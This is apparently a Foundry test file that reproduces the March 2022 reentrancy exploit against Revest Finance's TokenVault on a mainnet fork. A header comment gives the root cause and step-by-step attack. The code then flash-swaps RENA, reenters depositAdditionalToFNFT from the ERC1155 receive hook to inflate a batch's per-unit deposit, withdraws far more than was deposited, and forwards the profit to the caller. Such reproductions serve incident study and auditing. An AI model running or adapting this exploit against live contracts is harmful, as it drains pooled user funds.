// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
// VULNERABILITY: Reentrancy + FNFT ID/quantity hijacking during mint-to-receiver hook allows inflating per-unit depositAmount on a zero-deposit multi-FNFT batch, draining the TokenVault.
// Root cause: 
// - mintAddressLock -> doMint -> FNFTHandler.mint calls ERC1155._mint which synchronously invokes onERC1155Received on contract recipient (CEI violation: no reentrancy guard on mint/deposit paths).
// - During hook for a just-minted zero-deposit large-quantity FNFT (isMulti=true, depositAmount=0), attacker reenters depositAdditionalToFNFT on a "donor" low-supply FNFT (quant=2).
// - depositAdditionalToFNFT (no guard, no fnftId lock) sees qty<balance => createNewSeries=true; newFNFTId = getNextId() which (due to timing, fnftsCreated not yet ++) resolves to the in-flight large-batch ID; burns 1 from donor, mints +1 to the large ID (inflating its supply), depositToken+transfer 1e18, then handleMultipleDeposits(donorId, largeId, 0 + 1e18).
// - handleMultipleDeposits assigns the high per-unit value (1e18) to the large-batch FNFTConfig (previously 0), breaking the owed=supply*depositAmount invariant.
// - Post-mint, withdrawFNFT(largeId, 360000+1) succeeds (supply was +1'd) and withdrawToken pays out based on the inflated depositAmount * quantity, pulling far more RENA from the common asset pool than deposited (drains prior user locks + flash amount).
// Why it works: cross-fnft reentrancy allowed (custom RevestReentrancyGuard only on withdraw and keyed per-fnftId); getNextId() is a simple counter read during in-flight mint; depositAdditional mutates configs/does mints; vault accounting trusts the config.depositAmount without per-series isolation or total-owed validation on withdraw.
// Impact: Attacker with ~5 RENA flashloan drains orders-of-magnitude more RENA (360k amplification) from Revest TokenVault. Real incident (Mar 2022) at 0x2320A28f52334d62622cc2EaFa15DE55F9987eD9.
// EXPLOIT STEPS:
// 1. Flash-swap 5 RENA from RENA/WETH UniswapV2 pair (data triggers callback).
// 2. Approve RENA to Revest.
// 3. mintAddressLock(trigger=self, recipients=[self], quantities=[2], depositAmount=0, isMulti=true) => donor fnftId (e.g. 0), supply=2.
// 4. mintAddressLock(..., quantities=[360000], ...) => large fnftId=fnftId+1 (e.g. 1), supply=360000; during ERC1155 mint's onERC1155Received(id==1):
//    a. reentered=false => set reentered, call depositAdditionalToFNFT(donor=0, 1e18, 1).
//    b. Inside deposit: createNewSeries (1<2), newFNFTId=getNextId()=1 (still in-flight), burn(0,1), mint(self,1,1) => supply[1]=360001, depositToken(0,1e18,1), transfer 1e18, handle(0,1,1e18) => large fnft now has depositAmount=1e18.
// 5. Return from hook/mint; withdrawFNFT(1, 360001) (now <=supply, attacker bal=360001).
// 6. Vault pays attacker ~360k * 1e18 (inflated) from pooled RENA; repay flash with formula, skim profit to EOA.
// References: contracts_Revest.sol:115 (mintAddressLock), :368 (createFNFT before mint), :144 (only withdraw guarded), :235 (depositAdditionalToFNFT), :280 (mint in split), FNFTHandler:47 (_mint hook), RevestReentrancyGuard:13 (per-id only).

pragma solidity >=0.7.0 <0.9.0;

import "forge-std/Test.sol";
import "./../interface.sol";

contract ContractTest is Test {
    IUniswapV2Pair pair = IUniswapV2Pair(0xbC2C5392b0B841832bEC8b9C30747BADdA7b70ca);
    IERC20 rena = IERC20(0x56de8BC61346321D4F2211e3aC3c0A7F00dB9b76);
    IRevest revest = IRevest(0x2320A28f52334d62622cc2EaFa15DE55F9987eD9);
    uint256 fnftId;
    bool reentered = false;
    CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);

    function setUp() public {
        cheats.createSelectFork("http://127.0.0.1:8545", 14_465_356); //fork mainnet at 14465356
    }

    function testExploit() public {
        emit log_named_uint("Before exploit, Rena balance of attacker:", rena.balanceOf(msg.sender));
        pair.swap(5 * 1e18, 0, address(this), new bytes(1));
        emit log_named_uint("After exploit, Rena balance of attacker:", rena.balanceOf(msg.sender));
    }

    function uniswapV2Call(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
        rena.approve(address(revest), type(uint256).max);
        IRevest.FNFTConfig memory fnftConfig;
        fnftConfig.asset = address(rena);
        fnftConfig.pipeToContract = 0x0000000000000000000000000000000000000000;
        fnftConfig.depositAmount = 0;
        fnftConfig.depositMul = 0;
        fnftConfig.split = 0;
        fnftConfig.depositStopTime = 0;
        fnftConfig.maturityExtension = false;
        fnftConfig.isMulti = true;
        fnftConfig.nontransferrable = false;

        address[] memory recipients = new address[](1);
        uint256[] memory quantities = new uint256[](1);
        recipients[0] = address(this);
        quantities[0] = uint256(2);
        fnftId = revest.mintAddressLock(address(this), new bytes(0), recipients, quantities, fnftConfig);
        quantities[0] = uint256(360_000);
        revest.mintAddressLock(address(this), new bytes(0), recipients, quantities, fnftConfig);

        revest.withdrawFNFT(fnftId + 1, 360_000 + 1);

        rena.transfer(msg.sender, ((((amount0 / 997) * 1000) / 99) * 100) + 1000);
        rena.transfer(tx.origin, rena.balanceOf(address(this)));
    }

    function onERC1155Received(
        address operator,
        address from,
        uint256 id,
        uint256 value,
        bytes calldata data
    ) public returns (bytes4) {
        if (id == fnftId + 1 && !reentered) {
            reentered = true;
            revest.depositAdditionalToFNFT(fnftId, 1e18, 1);
        }
        return this.onERC1155Received.selector;
    }
}
